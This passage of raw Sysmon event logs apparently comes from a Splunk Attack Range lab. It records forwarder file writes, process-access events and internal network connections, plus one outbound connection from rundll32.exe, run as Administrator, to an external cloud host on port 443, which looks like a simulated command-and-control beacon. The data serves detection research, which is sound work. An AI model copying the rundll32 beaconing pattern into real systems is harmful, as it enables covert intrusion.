Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=48ECCC755062B8BBC9D317A5E27ACFF7,SHA256=0231067D514673CB0FEB3F3AEC560A185B42CD18E2BE9837DE2F5FFC58A7168D,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000440551Microsoft-Windows-Sysmon/Operationalwin-dc-932.attackrange.local-2021-04-27 12:24:14.198{42DC5269-CE98-6086-0C00-00000000BA01}840968C:\Windows\system32\svchost.exe{42DC5269-D4DA-6086-0B05-00000000BA01}4936C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x3600C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\psmserviceexthost.dll+966a|C:\Windows\SYSTEM32\psmserviceexthost.dll+776e|C:\Windows\SYSTEM32\psmserviceexthost.dll+3479f|C:\Windows\SYSTEM32\psmserviceexthost.dll+32739|C:\Windows\SYSTEM32\psmserviceexthost.dll+22de9|C:\Windows\SYSTEM32\psmserviceexthost.dll+1ee24|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000440550Microsoft-Windows-Sysmon/Operationalwin-dc-932.attackrange.local-2021-04-27 12:24:14.198{42DC5269-CE98-6086-0C00-00000000BA01}840968C:\Windows\system32\svchost.exe{42DC5269-D4DB-6086-0C05-00000000BA01}4248C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x3600C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\psmserviceexthost.dll+966a|C:\Windows\SYSTEM32\psmserviceexthost.dll+776e|C:\Windows\SYSTEM32\psmserviceexthost.dll+3479f|C:\Windows\SYSTEM32\psmserviceexthost.dll+32739|C:\Windows\SYSTEM32\psmserviceexthost.dll+22de9|C:\Windows\SYSTEM32\psmserviceexthost.dll+1ee24|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 23542300x8000000000000000291624Microsoft-Windows-Sysmon/Operationalwin-host-96.attackrange.local-2021-04-27 12:24:15.788{BEA10069-D14B-6086-D000-00000000BB01}3836NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=041BF8F2337A263F7E245017997B6521,SHA256=B1FD8260B2AED83BA9023905D0A98B7616D93A1624D32982D3998115BB6FE143,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000440554Microsoft-Windows-Sysmon/Operationalwin-dc-932.attackrange.local-2021-04-27 12:24:15.199{42DC5269-CE98-6086-0C00-00000000BA01}840968C:\Windows\system32\svchost.exe{42DC5269-D4DA-6086-0B05-00000000BA01}4936C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x3600C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\psmserviceexthost.dll+966a|C:\Windows\SYSTEM32\psmserviceexthost.dll+776e|C:\Windows\SYSTEM32\psmserviceexthost.dll+3479f|C:\Windows\SYSTEM32\psmserviceexthost.dll+32739|C:\Windows\SYSTEM32\psmserviceexthost.dll+22de9|C:\Windows\SYSTEM32\psmserviceexthost.dll+1ee24|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000440553Microsoft-Windows-Sysmon/Operationalwin-dc-932.attackrange.local-2021-04-27 12:24:15.199{42DC5269-CE98-6086-0C00-00000000BA01}840968C:\Windows\system32\svchost.exe{42DC5269-D4DB-6086-0C05-00000000BA01}4248C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x3600C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\psmserviceexthost.dll+966a|C:\Windows\SYSTEM32\psmserviceexthost.dll+776e|C:\Windows\SYSTEM32\psmserviceexthost.dll+3479f|C:\Windows\SYSTEM32\psmserviceexthost.dll+32739|C:\Windows\SYSTEM32\psmserviceexthost.dll+22de9|C:\Windows\SYSTEM32\psmserviceexthost.dll+1ee24|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 23542300x8000000000000000440552Microsoft-Windows-Sysmon/Operationalwin-dc-932.attackrange.local-2021-04-27 12:24:15.016{42DC5269-CF49-6086-E100-00000000BA01}4048NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=755C2D5F37A9EF9B7509B37FEF56771B,SHA256=0EFEB918E0168A76019A03762B96D65649D18FE284DD84913CCAFC9252E5111E,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000291623Microsoft-Windows-Sysmon/Operationalwin-host-96.attackrange.local-2021-04-27 12:24:13.450{BEA10069-D145-6086-C700-00000000BB01}2620C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-96.attackrange.local50625-false10.0.1.12ip-10-0-1-12.us-west-2.compute.internal8000- 23542300x8000000000000000291622Microsoft-Windows-Sysmon/Operationalwin-host-96.attackrange.local-2021-04-27 12:24:15.155{BEA10069-D14B-6086-D000-00000000BB01}3836NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=72591BE0413050CA2123D0DFB01DBC4C,SHA256=F6C2D95C1E64A8461D7074556E66F5FE9744CCC9A8A938096DD20A2559CDF3B9,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000291621Microsoft-Windows-Sysmon/Operationalwin-host-96.attackrange.local-2021-04-27 12:24:15.155{BEA10069-D14B-6086-D000-00000000BB01}3836NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=34B53349D86EFA5EDAE3821E839CCAE4,SHA256=31B36EE2F25DC9074720EDF855924067D3C6A0831D7A8B3A524BB57F1D155B2B,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000291625Microsoft-Windows-Sysmon/Operationalwin-host-96.attackrange.local-2021-04-27 12:24:16.790{BEA10069-D14B-6086-D000-00000000BB01}3836NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=956FC7A2F5B68CB0639370E28EA12190,SHA256=FE478C355430C2B52917576E41833E3434E7248D7FFCDC0EFF8FC8531F2790EA,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000440557Microsoft-Windows-Sysmon/Operationalwin-dc-932.attackrange.local-2021-04-27 12:24:16.200{42DC5269-CE98-6086-0C00-00000000BA01}840968C:\Windows\system32\svchost.exe{42DC5269-D4DA-6086-0B05-00000000BA01}4936C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x3600C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\psmserviceexthost.dll+966a|C:\Windows\SYSTEM32\psmserviceexthost.dll+776e|C:\Windows\SYSTEM32\psmserviceexthost.dll+3479f|C:\Windows\SYSTEM32\psmserviceexthost.dll+32739|C:\Windows\SYSTEM32\psmserviceexthost.dll+22de9|C:\Windows\SYSTEM32\psmserviceexthost.dll+1ee24|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000440556Microsoft-Windows-Sysmon/Operationalwin-dc-932.attackrange.local-2021-04-27 12:24:16.200{42DC5269-CE98-6086-0C00-00000000BA01}840968C:\Windows\system32\svchost.exe{42DC5269-D4DB-6086-0C05-00000000BA01}4248C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x3600C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\psmserviceexthost.dll+966a|C:\Windows\SYSTEM32\psmserviceexthost.dll+776e|C:\Windows\SYSTEM32\psmserviceexthost.dll+3479f|C:\Windows\SYSTEM32\psmserviceexthost.dll+32739|C:\Windows\SYSTEM32\psmserviceexthost.dll+22de9|C:\Windows\SYSTEM32\psmserviceexthost.dll+1ee24|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 23542300x8000000000000000440555Microsoft-Windows-Sysmon/Operationalwin-dc-932.attackrange.local-2021-04-27 12:24:16.039{42DC5269-CF49-6086-E100-00000000BA01}4048NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=CCE0AA812EC57D7CA779EBF1985B6036,SHA256=068316AF5D5FD972A087478FEFB90FC1B0EC5C78D35A0A46DCEBA0DEA3E94857,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000291626Microsoft-Windows-Sysmon/Operationalwin-host-96.attackrange.local-2021-04-27 12:24:17.792{BEA10069-D14B-6086-D000-00000000BB01}3836NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=E6902DCADA4F9493AF1AFCE64C3322FF,SHA256=481D022626ECF2E55F4112802FA306843757A9BA2EE1C56C3D8A1982267375B7,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000440563Microsoft-Windows-Sysmon/Operationalwin-dc-932.attackrange.local-2021-04-27 12:24:14.578{42DC5269-CF43-6086-D800-00000000BA01}4100C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-932.attackrange.local62411-false10.0.1.12-8000- 10341000x8000000000000000440562Microsoft-Windows-Sysmon/Operationalwin-dc-932.attackrange.local-2021-04-27 12:24:17.201{42DC5269-CE98-6086-0C00-00000000BA01}840968C:\Windows\system32\svchost.exe{42DC5269-D4DA-6086-0B05-00000000BA01}4936C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x3600C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\psmserviceexthost.dll+966a|C:\Windows\SYSTEM32\psmserviceexthost.dll+776e|C:\Windows\SYSTEM32\psmserviceexthost.dll+3479f|C:\Windows\SYSTEM32\psmserviceexthost.dll+32739|C:\Windows\SYSTEM32\psmserviceexthost.dll+22de9|C:\Windows\SYSTEM32\psmserviceexthost.dll+1ee24|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000440561Microsoft-Windows-Sysmon/Operationalwin-dc-932.attackrange.local-2021-04-27 12:24:17.201{42DC5269-CE98-6086-0C00-00000000BA01}840968C:\Windows\system32\svchost.exe{42DC5269-D4DB-6086-0C05-00000000BA01}4248C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x3600C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\psmserviceexthost.dll+966a|C:\Windows\SYSTEM32\psmserviceexthost.dll+776e|C:\Windows\SYSTEM32\psmserviceexthost.dll+3479f|C:\Windows\SYSTEM32\psmserviceexthost.dll+32739|C:\Windows\SYSTEM32\psmserviceexthost.dll+22de9|C:\Windows\SYSTEM32\psmserviceexthost.dll+1ee24|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 23542300x8000000000000000440560Microsoft-Windows-Sysmon/Operationalwin-dc-932.attackrange.local-2021-04-27 12:24:17.193{42DC5269-CF49-6086-E100-00000000BA01}4048NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=E868B3A36121BF6D3346783FD21D0924,SHA256=71BE5935FD1958C062E376D44CBA353FD3C08D950ABD5D4FE3F2812122C75689,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000440559Microsoft-Windows-Sysmon/Operationalwin-dc-932.attackrange.local-2021-04-27 12:24:17.192{42DC5269-CF49-6086-E100-00000000BA01}4048NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=AC8C5DBFE00BCD0E47D681AC2FCBC9F1,SHA256=D6016237ED6284DCDF9089CB762D60ADB8C345BCA5083EC34316F5774279DC92,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000440558Microsoft-Windows-Sysmon/Operationalwin-dc-932.attackrange.local-2021-04-27 12:24:17.061{42DC5269-CF49-6086-E100-00000000BA01}4048NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=736840AC7A55B5521CF5AC2FF833250C,SHA256=2D643DF4D8F70854066B2049ADAD5F45E667215A62AD956EE7A2D6E423DCC611,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000291627Microsoft-Windows-Sysmon/Operationalwin-host-96.attackrange.local-2021-04-27 12:24:18.794{BEA10069-D14B-6086-D000-00000000BB01}3836NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=C9BA6FFFEA6DD481995D1E911CCE6754,SHA256=F954145290239033B31422B8DA9FDCD9BD710F34C0594767B19238CAEFA45425,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000440566Microsoft-Windows-Sysmon/Operationalwin-dc-932.attackrange.local-2021-04-27 12:24:18.202{42DC5269-CE98-6086-0C00-00000000BA01}840968C:\Windows\system32\svchost.exe{42DC5269-D4DA-6086-0B05-00000000BA01}4936C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x3600C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\psmserviceexthost.dll+966a|C:\Windows\SYSTEM32\psmserviceexthost.dll+776e|C:\Windows\SYSTEM32\psmserviceexthost.dll+3479f|C:\Windows\SYSTEM32\psmserviceexthost.dll+32739|C:\Windows\SYSTEM32\psmserviceexthost.dll+22de9|C:\Windows\SYSTEM32\psmserviceexthost.dll+1ee24|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000440565Microsoft-Windows-Sysmon/Operationalwin-dc-932.attackrange.local-2021-04-27 12:24:18.202{42DC5269-CE98-6086-0C00-00000000BA01}840968C:\Windows\system32\svchost.exe{42DC5269-D4DB-6086-0C05-00000000BA01}4248C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x3600C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\psmserviceexthost.dll+966a|C:\Windows\SYSTEM32\psmserviceexthost.dll+776e|C:\Windows\SYSTEM32\psmserviceexthost.dll+3479f|C:\Windows\SYSTEM32\psmserviceexthost.dll+32739|C:\Windows\SYSTEM32\psmserviceexthost.dll+22de9|C:\Windows\SYSTEM32\psmserviceexthost.dll+1ee24|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 23542300x8000000000000000440564Microsoft-Windows-Sysmon/Operationalwin-dc-932.attackrange.local-2021-04-27 12:24:18.071{42DC5269-CF49-6086-E100-00000000BA01}4048NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=B20436E7CCA7C2C59A4F35DCA51FDF49,SHA256=7C20892CC8C2F9FBAA3605C00385BFB2B0F1AA5620F94BE1E7CCC453529CDBE2,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000291628Microsoft-Windows-Sysmon/Operationalwin-host-96.attackrange.local-2021-04-27 12:24:19.813{BEA10069-D14B-6086-D000-00000000BB01}3836NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=F796B68683D98150FB47DA0E365C2D85,SHA256=68271E472F57B2D90F5C0CFF7547C1550F2F080C301371BE67EB72736323B277,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000440569Microsoft-Windows-Sysmon/Operationalwin-dc-932.attackrange.local-2021-04-27 12:24:19.290{42DC5269-CF49-6086-E100-00000000BA01}4048NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=D7BE98B08B48E438AC1C912A715DB81C,SHA256=1D5C3A051849D0BAB2361DCCF023C3D6851FA045316A6FB7F36A8C9A862A13AA,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000440568Microsoft-Windows-Sysmon/Operationalwin-dc-932.attackrange.local-2021-04-27 12:24:19.203{42DC5269-CE98-6086-0C00-00000000BA01}840968C:\Windows\system32\svchost.exe{42DC5269-D4DA-6086-0B05-00000000BA01}4936C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x3600C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\psmserviceexthost.dll+966a|C:\Windows\SYSTEM32\psmserviceexthost.dll+776e|C:\Windows\SYSTEM32\psmserviceexthost.dll+3479f|C:\Windows\SYSTEM32\psmserviceexthost.dll+32739|C:\Windows\SYSTEM32\psmserviceexthost.dll+22de9|C:\Windows\SYSTEM32\psmserviceexthost.dll+1ee24|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000440567Microsoft-Windows-Sysmon/Operationalwin-dc-932.attackrange.local-2021-04-27 12:24:19.203{42DC5269-CE98-6086-0C00-00000000BA01}840968C:\Windows\system32\svchost.exe{42DC5269-D4DB-6086-0C05-00000000BA01}4248C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x3600C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\psmserviceexthost.dll+966a|C:\Windows\SYSTEM32\psmserviceexthost.dll+776e|C:\Windows\SYSTEM32\psmserviceexthost.dll+3479f|C:\Windows\SYSTEM32\psmserviceexthost.dll+32739|C:\Windows\SYSTEM32\psmserviceexthost.dll+22de9|C:\Windows\SYSTEM32\psmserviceexthost.dll+1ee24|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 23542300x8000000000000000291632Microsoft-Windows-Sysmon/Operationalwin-host-96.attackrange.local-2021-04-27 12:24:20.851{BEA10069-D14B-6086-D000-00000000BB01}3836NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=D63286C82DD16FBBC61475F5C7C7F1D0,SHA256=E86DBBCE0F56DB56C6C78E3D205FE34C93C0725742891A737F004ADA75543D68,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000440572Microsoft-Windows-Sysmon/Operationalwin-dc-932.attackrange.local-2021-04-27 12:24:20.299{42DC5269-CF49-6086-E100-00000000BA01}4048NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=D78CC281387CA49DBD3AFA67C29D640C,SHA256=CACFA3EEB1C00093908950F4AC3510AE223718968AE42830442B37B3BC6C7D29,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000291631Microsoft-Windows-Sysmon/Operationalwin-host-96.attackrange.local-2021-04-27 12:24:18.491{BEA10069-D145-6086-C700-00000000BB01}2620C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-96.attackrange.local50626-false10.0.1.12ip-10-0-1-12.us-west-2.compute.internal8000- 23542300x8000000000000000291630Microsoft-Windows-Sysmon/Operationalwin-host-96.attackrange.local-2021-04-27 12:24:20.215{BEA10069-D14B-6086-D000-00000000BB01}3836NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=AAAF9A8E06FF19E94BCA4D044F5270B5,SHA256=32FA4A890C52CDD4C2C43361F06DB4F9249584801E54FCB966FE8328D2347B7D,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000291629Microsoft-Windows-Sysmon/Operationalwin-host-96.attackrange.local-2021-04-27 12:24:20.215{BEA10069-D14B-6086-D000-00000000BB01}3836NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=72591BE0413050CA2123D0DFB01DBC4C,SHA256=F6C2D95C1E64A8461D7074556E66F5FE9744CCC9A8A938096DD20A2559CDF3B9,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000440571Microsoft-Windows-Sysmon/Operationalwin-dc-932.attackrange.local-2021-04-27 12:24:20.204{42DC5269-CE98-6086-0C00-00000000BA01}840968C:\Windows\system32\svchost.exe{42DC5269-D4DA-6086-0B05-00000000BA01}4936C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x3600C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\psmserviceexthost.dll+966a|C:\Windows\SYSTEM32\psmserviceexthost.dll+776e|C:\Windows\SYSTEM32\psmserviceexthost.dll+3479f|C:\Windows\SYSTEM32\psmserviceexthost.dll+32739|C:\Windows\SYSTEM32\psmserviceexthost.dll+22de9|C:\Windows\SYSTEM32\psmserviceexthost.dll+1ee24|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000440570Microsoft-Windows-Sysmon/Operationalwin-dc-932.attackrange.local-2021-04-27 12:24:20.204{42DC5269-CE98-6086-0C00-00000000BA01}840968C:\Windows\system32\svchost.exe{42DC5269-D4DB-6086-0C05-00000000BA01}4248C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x3600C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\psmserviceexthost.dll+966a|C:\Windows\SYSTEM32\psmserviceexthost.dll+776e|C:\Windows\SYSTEM32\psmserviceexthost.dll+3479f|C:\Windows\SYSTEM32\psmserviceexthost.dll+32739|C:\Windows\SYSTEM32\psmserviceexthost.dll+22de9|C:\Windows\SYSTEM32\psmserviceexthost.dll+1ee24|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 23542300x8000000000000000291634Microsoft-Windows-Sysmon/Operationalwin-host-96.attackrange.local-2021-04-27 12:24:21.853{BEA10069-D14B-6086-D000-00000000BB01}3836NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=0D0C794DB91FF468176FA8913E452FDC,SHA256=A68CEE94E19C76AAAE23674D05C8CEB05C8975AF5568DFDEF7FBF600EE9C24BC,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000440576Microsoft-Windows-Sysmon/Operationalwin-dc-932.attackrange.local-2021-04-27 12:24:21.970{42DC5269-CF3C-6086-AA00-00000000BA01}4168NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunkd.exeC:\Program Files\SplunkUniversalForwarder\var\run\serverclass.xmlMD5=1385DDF0A626EB1FF1FAEF0A6E1E1E19,SHA256=D3A04D6A86810FFAE54532D83A4C2D8246C33C9E5E1AB8193B89366C377D56F8,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000440575Microsoft-Windows-Sysmon/Operationalwin-dc-932.attackrange.local-2021-04-27 12:24:21.319{42DC5269-CF49-6086-E100-00000000BA01}4048NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=2F92EDB7700CA1499FBAE9E7957501B2,SHA256=5B8ADCFA12A896333C72EADB3F29AD99010EDE1D56CFE4A3058AE45BCBD543A5,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000291633Microsoft-Windows-Sysmon/Operationalwin-host-96.attackrange.local-2021-04-27 12:24:18.761{BEA10069-187E-6087-4F0E-00000000BB01}3388C:\Windows\SysWOW64\rundll32.exeWIN-HOST-96\Administratortcptruefalse10.0.1.15win-host-96.attackrange.local50627-false34.218.235.219ec2-34-218-235-219.us-west-2.compute.amazonaws.com443https 10341000x8000000000000000440574Microsoft-Windows-Sysmon/Operationalwin-dc-932.attackrange.local-2021-04-27 12:24:21.205{42DC5269-CE98-6086-0C00-00000000BA01}840968C:\Windows\system32\svchost.exe{42DC5269-D4DA-6086-0B05-00000000BA01}4936C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x3600C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\psmserviceexthost.dll+966a|C:\Windows\SYSTEM32\psmserviceexthost.dll+776e|C:\Windows\SYSTEM32\psmserviceexthost.dll+3479f|C:\Windows\SYSTEM32\psmserviceexthost.dll+32739|C:\Windows\SYSTEM32\psmserviceexthost.dll+22de9|C:\Windows\SYSTEM32\psmserviceexthost.dll+1ee24|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000440573Microsoft-Windows-Sysmon/Operationalwin-dc-932.attackrange.local-2021-04-27 12:24:21.205{42DC5269-CE98-6086-0C00-00000000BA01}840968C:\Windows\system32\svchost.exe{42DC5269-D4DB-6086-0C05-00000000BA01}4248C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x3600C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\psmserviceexthost.dll+966a|C:\Windows\SYSTEM32\psmserviceexthost.dll+776e|C:\Windows\SYSTEM32\psmserviceexthost.dll+3479f|C:\Windows\SYSTEM32\psmserviceexthost.dll+32739|C:\Windows\SYSTEM32\psmserviceexthost.dll+22de9|C:\Windows\SYSTEM32\psmserviceexthost.dll+1ee24|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 23542300x8000000000000000291649Microsoft-Windows-Sysmon/Operationalwin-host-96.attackrange.local-2021-04-27 12:24:22.855{BEA10069-D14B-6086-D000-00000000BB01}3836NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=18947C261F2612F32A3577EE40A67B77,SHA256=DD71C2E5888AE99992D5B1825FD002439F4ECE3254F803FD8D2E3BB45192947A,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000440582Microsoft-Windows-Sysmon/Operationalwin-dc-932.attackrange.local-2021-04-27 12:24:19.696{42DC5269-CF43-6086-D800-00000000BA01}4100C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-932.attackrange.local62412-false10.0.1.12-8000- 23542300x8000000000000000440581Microsoft-Windows-Sysmon/Operationalwin-dc-932.attackrange.local-2021-04-27 12:24:22.330{42DC5269-CF49-6086-E100-00000000BA01}4048NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program 